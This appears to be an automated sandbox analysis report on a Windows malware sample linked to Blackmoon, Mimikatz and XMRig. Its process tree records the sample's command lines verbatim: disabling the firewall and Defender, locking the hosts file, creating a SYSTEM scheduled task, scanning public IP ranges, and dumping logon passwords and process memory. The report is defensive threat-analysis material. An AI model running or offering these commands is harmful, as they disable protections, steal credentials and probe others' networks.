Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 22:29

General

  • Target

    c10bab0ab14916e09297efcee48c329469a95bb3f50a60a0a89f434394a7ab2f.exe

  • Size

    8.8MB

  • MD5

    818d5b9755e017a608a0a0448a194cd6

  • SHA1

    4aae384b933f6ea4070f4410324059afc633cc58

  • SHA256

    c10bab0ab14916e09297efcee48c329469a95bb3f50a60a0a89f434394a7ab2f

  • SHA512

    b556353cd5cf89e8dd3b7375db1a4ee8779a8d01997c7d7b9d019ec0f24c107f6f14ced32b2ee316b442173cb94b09cd1a253ac457fb5be495238dd42affaa75

  • SSDEEP

    98304:TRoeO6XTBJYazImknGzZr+HIPFtmOZ9G17xwFB5URUSKnaSOdroSCa:NoeO6XTYxmknGzwHIPHd9swFBubKT

Malware Config

Signatures

  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 5 IoCs
  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (66320) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 13 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 41 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    remove IFEO.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 45 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2156
      • C:\Windows\TEMP\fsyyufbyc\veqgqd.exe
        "C:\Windows\TEMP\fsyyufbyc\veqgqd.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:6096
    • C:\Users\Admin\AppData\Local\Temp\c10bab0ab14916e09297efcee48c329469a95bb3f50a60a0a89f434394a7ab2f.exe
      "C:\Users\Admin\AppData\Local\Temp\c10bab0ab14916e09297efcee48c329469a95bb3f50a60a0a89f434394a7ab2f.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\trvuvbys\lbntnde.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4716
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3692
        • C:\Windows\trvuvbys\lbntnde.exe
          C:\Windows\trvuvbys\lbntnde.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2592
    • C:\Windows\trvuvbys\lbntnde.exe
      C:\Windows\trvuvbys\lbntnde.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Indicator Removal: Clear Persistence
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5044
      • C:\Windows\trvuvbys\kxaijjkeemnjdde32537.exe
        C:\Windows\trvuvbys\kxaijjkeemnjdde32537.exe
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:952
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4152
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4256
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:5004
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4888
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:3468
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
                PID:5040
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static delete all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4548
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3252
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:832
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utamtesms" /ru system /tr "cmd /c C:\Windows\Fonts\lbntnde.exe"
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4616
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                  PID:4740
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "utamtesms" /ru system /tr "cmd /c C:\Windows\Fonts\lbntnde.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2680
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                PID:1176
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:1200
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                2⤵
                • System Location Discovery: System Language Discovery
                PID:432
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static set policy name=Bastards assign=y
                2⤵
                • Event Triggered Execution: Netsh Helper DLL
                PID:4024
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                2⤵
                  PID:1008
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3528
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1356
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1208
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:5096
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                    PID:1508
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4492
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4656
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                      PID:1928
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                          PID:4768
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SharedAccess
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:448
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                          PID:2740
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                            • Modifies Windows Firewall
                            • System Location Discovery: System Language Discovery
                            PID:4568
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh Advfirewall set allprofiles state off
                          2⤵
                            PID:3084
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh Advfirewall set allprofiles state off
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:2104
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop MpsSvc
                            2⤵
                              PID:1820
                              • C:\Windows\SysWOW64\net.exe
                                net stop MpsSvc
                                3⤵
                                  PID:4272
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop MpsSvc
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2756
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop WinDefend
                                2⤵
                                  PID:4800
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    3⤵
                                      PID:4888
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop WinDefend
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1732
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop WinDefend
                                        4⤵
                                          PID:4352
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c net stop wuauserv
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3692
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop wuauserv
                                        3⤵
                                          PID:3924
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop wuauserv
                                            4⤵
                                              PID:4548
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c sc config MpsSvc start= disabled
                                          2⤵
                                            PID:1640
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config MpsSvc start= disabled
                                              3⤵
                                              • Launches sc.exe
                                              PID:4624
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c sc config SharedAccess start= disabled
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2128
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config SharedAccess start= disabled
                                              3⤵
                                              • Launches sc.exe
                                              • System Location Discovery: System Language Discovery
                                              PID:2180
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c sc config WinDefend start= disabled
                                            2⤵
                                              PID:1620
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc config WinDefend start= disabled
                                                3⤵
                                                • Launches sc.exe
                                                • System Location Discovery: System Language Discovery
                                                PID:4216
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c sc config wuauserv start= disabled
                                              2⤵
                                                PID:3412
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc config wuauserv start= disabled
                                                  3⤵
                                                  • Launches sc.exe
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4996
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\rqfmysvtl\ytlimcrtn\wpcap.exe /S
                                                2⤵
                                                  PID:3724
                                                  • C:\Windows\rqfmysvtl\ytlimcrtn\wpcap.exe
                                                    C:\Windows\rqfmysvtl\ytlimcrtn\wpcap.exe /S
                                                    3⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in System32 directory
                                                    • Drops file in Program Files directory
                                                    PID:4076
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net stop "Boundary Meter"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4404
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 stop "Boundary Meter"
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:920
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net stop "TrueSight Meter"
                                                      4⤵
                                                        PID:3780
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          5⤵
                                                            PID:4024
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop "TrueSight Meter"
                                                            5⤵
                                                              PID:3524
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net stop npf
                                                            4⤵
                                                              PID:2792
                                                              • C:\Windows\SysWOW64\net1.exe
                                                                C:\Windows\system32\net1 stop npf
                                                                5⤵
                                                                  PID:4164
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net start npf
                                                                4⤵
                                                                  PID:1000
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 start npf
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5036
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c net start npf
                                                              2⤵
                                                                PID:664
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net start npf
                                                                  3⤵
                                                                    PID:2784
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 start npf
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4484
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c net start npf
                                                                  2⤵
                                                                    PID:4500
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net start npf
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1196
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 start npf
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:436
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c C:\Windows\rqfmysvtl\ytlimcrtn\mltctcnbm.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\rqfmysvtl\ytlimcrtn\Scantest.txt
                                                                    2⤵
                                                                      PID:5104
                                                                      • C:\Windows\rqfmysvtl\ytlimcrtn\mltctcnbm.exe
                                                                        C:\Windows\rqfmysvtl\ytlimcrtn\mltctcnbm.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\rqfmysvtl\ytlimcrtn\Scantest.txt
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4408
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c C:\Windows\rqfmysvtl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rqfmysvtl\Corporate\log.txt
                                                                      2⤵
                                                                      • Drops file in Windows directory
                                                                      PID:2736
                                                                      • C:\Windows\rqfmysvtl\Corporate\vfshost.exe
                                                                        C:\Windows\rqfmysvtl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4996
                                                                    • C:\Windows\TEMP\amydesk.exe
                                                                      C:\Windows\TEMP\amydesk.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in System32 directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:940
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 444 C:\Windows\TEMP\rqfmysvtl\444.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1732
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c C:\Windows\rqfmysvtl\ytlimcrtn\scan.bat
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3412
                                                                      • C:\Windows\rqfmysvtl\ytlimcrtn\iltrqyctt.exe
                                                                        iltrqyctt.exe TCP 194.110.0.1 194.110.255.255 802 512 /save
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Windows directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5040
                                                                      • C:\Windows\rqfmysvtl\ytlimcrtn\iltrqyctt.exe
                                                                        iltrqyctt.exe TCP 203.34.0.1 203.34.255.255 802 512 /save
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4020
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 520 C:\Windows\TEMP\rqfmysvtl\520.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3936
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 528 C:\Windows\TEMP\rqfmysvtl\528.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4224
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 656 C:\Windows\TEMP\rqfmysvtl\656.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5416
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 768 C:\Windows\TEMP\rqfmysvtl\768.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1404
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 776 C:\Windows\TEMP\rqfmysvtl\776.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5236
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2488 C:\Windows\TEMP\rqfmysvtl\2488.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2212
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2652 C:\Windows\TEMP\rqfmysvtl\2652.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3648
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2796 C:\Windows\TEMP\rqfmysvtl\2796.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2540
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static delete all
                                                                      2⤵
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      PID:5968
                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 2964 C:\Windows\TEMP\rqfmysvtl\2964.dmp
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3512
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                                                                      2⤵
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4700
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filteraction name=BastardsList action=block
                                                                      2⤵
                                                                        PID:4012
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                                        2⤵
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:3140
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                        2⤵
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4404
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                        2⤵
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:5788
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:3112
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                        2⤵
                                                                          PID:5916
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                          2⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          PID:5872
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2592
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static set policy name=Bastards assign=y
                                                                          2⤵
                                                                            PID:5452
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                            2⤵
                                                                              PID:5712
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                3⤵
                                                                                  PID:5804
                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                  3⤵
                                                                                    PID:1836
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                    3⤵
                                                                                      PID:5320
                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                      3⤵
                                                                                        PID:3500
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5304
                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3248
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 3152 C:\Windows\TEMP\rqfmysvtl\3152.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5568
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 3892 C:\Windows\TEMP\rqfmysvtl\3892.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5376
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 3956 C:\Windows\TEMP\rqfmysvtl\3956.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1436
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4032 C:\Windows\TEMP\rqfmysvtl\4032.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3180
                                                                                    • C:\Windows\TEMP\rqfmysvtl\drenltvur.exe
                                                                                      C:\Windows\TEMP\rqfmysvtl\drenltvur.exe -accepteula -mp 4188 C:\Windows\TEMP\rqfmysvtl\4188.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4716
